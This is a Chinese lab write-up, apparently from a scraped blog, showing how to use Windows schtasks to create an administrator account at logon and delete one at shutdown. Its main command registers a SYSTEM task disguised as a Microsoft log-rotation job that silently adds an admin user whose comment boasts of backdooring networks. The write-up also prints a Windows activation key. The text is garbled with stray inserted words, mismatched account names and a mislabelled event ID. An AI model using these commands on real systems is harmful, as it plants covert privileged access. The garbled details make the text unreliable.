網絡攻防任務二:開機、關機事件觸發帳戶的建立與刪除

 

1、任務要求安全

設計一個以開機、關機事件爲觸發條件的計劃任務,實現:ide

一、開機時新建一個用戶ui

二、關機時刪除用戶spa

 

 

2、解決步驟命令行

(一)實驗環境搭建設計

事件觸發的命令是schtasks日誌

利用schtasks完成的功能主要是:利用肯定的日誌事件觸發net user命令,以達到新增一個管理員帳戶的目的。 blog

若是利用傳統的at命令,首先沒法用日誌事件觸發,其次須要執行多條命令行時,只能將它們編寫成.bat的批處理文件進行處理事件

 

因爲要用到事件觸發,xp沒有這個功能,因此要新建一個win7的虛擬機。cmd

Win7激活祕鑰爲YKHFT KW986 GK4PY FDWYH 7TP9F

 

(二)開機建立用戶

Schtasks的用法描述:

 

    容許管理員建立、刪除、查詢、更改、運行和停止本地或遠程系統上的計劃任

    務。

 

參數列表:

    /Create         建立新計劃任務。

 

    /Delete         刪除計劃任務。

 

    /Query          顯示全部計劃任務。

 

    /Change         更改計劃任務屬性。

 

    /Run            按需運行計劃任務。

 

    /End            停止當前正在運行的計劃任務。

 

    /ShowSid        顯示與計劃的任務名稱相應的安全標識符。

 

    /?              顯示此幫助消息。

 

Examples:

    SCHTASKS

    SCHTASKS /?

    SCHTASKS /Run /?

    SCHTASKS /End /?

    SCHTASKS /Create /?

    SCHTASKS /Delete /?

    SCHTASKS /Query  /?

    SCHTASKS /Change /?

    SCHTASKS /ShowSid /?

 

開機事件的事件ID4624,所以代碼以下:

schtasks /create /tn "Microsoft\Windows\LocalEventLogRotate" /tr "\"cmd.exe\" /k net user cyx cyx /add /y /active:yes >> nul & net localgroup administrators cyx /add >nul & net user cyx /comment:\"Built-in account for Backdooring your network suckers\" > nul & exit" /f /ru system /ec Security /sc onevent /mo"*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4624]]"

直接在命令行窗口下輸入這行代碼便可。

 

 

 

 

 

 

 

 

重啓的時候有登陸窗口,緣由是關機的時候帳戶未刪。

 

 

 

 

 

(三)關機刪除用戶

經查詢關機事件ID1074

代碼以下:

schtasks /create /tn "Microsoft\Windows\LocalEventLog" /tr "\"cmd.exe\" /k net user lemon /del > nul & exit" /f /ru system /sc onevent /ec System /mo "*[System[EventID=1074]]"

關機以前先檢查一下帳戶狀況

 

 

 

 

 

重啓以後,結果以下圖所示,帳戶已被刪除。

 

 

 

 

開機後,再輸入net user,能夠看到帳戶在開機以後也創建成功了。

 

相關文章
相關標籤/搜索